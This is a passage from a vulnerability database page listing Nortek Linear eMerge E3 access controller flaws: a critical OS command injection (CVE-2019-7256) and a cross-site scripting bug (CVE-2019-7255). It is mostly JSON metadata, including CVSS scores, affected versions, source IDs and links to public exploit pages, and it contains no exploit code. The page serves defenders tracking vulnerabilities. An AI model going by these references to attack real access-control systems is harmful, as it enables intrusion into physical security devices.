Search

Find a vulnerability

Search criteria Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.

    21 vulnerabilities by nortekcontrol

    VAR-201907-0157

    Vulnerability from variot - Updated: 2024-06-02 22:38

    Linear eMerge E3-Series devices allow Command Injections. Linear eMerge E3 The devices in the series include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. The vulnerability stems from the program using external input to build commands, but fails to properly handle the special elements of the commands that can be modified. An attacker could exploit the vulnerability to directly execute dangerous commands on the operating system

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0157",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": null,
            "trust": 0.6,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7256",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7256",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-21274",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158691",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7256",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7256",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-21274",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-107",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158691",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7256",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Command Injections. Linear eMerge E3 The devices in the series include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. The vulnerability stems from the program using external input to build commands, but fails to properly handle the special elements of the commands that can be modified. An attacker could exploit the vulnerability to directly execute dangerous commands on the operating system",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-158691",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7256",
            "trust": 4.0
          },
          {
            "db": "PACKETSTORM",
            "id": "170372",
            "trust": 1.8
          },
          {
            "db": "PACKETSTORM",
            "id": "155255",
            "trust": 1.8
          },
          {
            "db": "PACKETSTORM",
            "id": "155272",
            "trust": 1.8
          },
          {
            "db": "PACKETSTORM",
            "id": "155256",
            "trust": 1.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47619",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "id": "VAR-201907-0157",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          }
        ]
      },
      "last_update_date": "2024-06-02T22:38:30.013000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          },
          {
            "title": "Nuclei Templates\nResources",
            "trust": 0.1,
            "url": "https://github.com/merlinepedra25/nuclei-templates "
          },
          {
            "title": "Nuclei Templates\nResources",
            "trust": 0.1,
            "url": "https://github.com/merlinepedra/nuclei-templates "
          },
          {
            "title": "Kenzer Templates [1289]",
            "trust": 0.1,
            "url": "https://github.com/elsfa7-110/kenzer-templates "
          },
          {
            "title": "PoC in GitHub",
            "trust": 0.1,
            "url": "https://github.com/manas3c/cve-poc "
          },
          {
            "title": "Kenzer Templates [5170] [DEPRECATED]",
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-77",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.2,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.4,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/155272/linear-emerge-e3-access-controller-command-injection.html"
          },
          {
            "trust": 1.9,
            "url": "http://packetstormsecurity.com/files/155255/linear-emerge-e3-1.00-06-card_scan.php-command-injection.html"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/155256/linear-emerge-e3-1.00-06-card_scan_decoder.php-command-injection.html"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/170372/linear-emerge-e3-series-access-controller-command-injection.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7256"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47619"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "date": "2019-07-02T19:15:11.147000",
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21274"
          },
          {
            "date": "2023-03-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158691"
          },
          {
            "date": "2023-03-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7256"
          },
          {
            "date": "2024-05-31T03:34:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          },
          {
            "date": "2023-01-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          },
          {
            "date": "2024-05-23T17:58:01.130000",
            "db": "NVD",
            "id": "CVE-2019-7256"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 For devices in the series \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005909"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-107"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0156

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow XSS. Linear eMerge E3 series devices contain a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. A cross-site scripting vulnerability exists in LineareMergeE3-Series. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0156",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": null,
            "trust": 0.6,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7255",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": true,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.3,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2019-7255",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
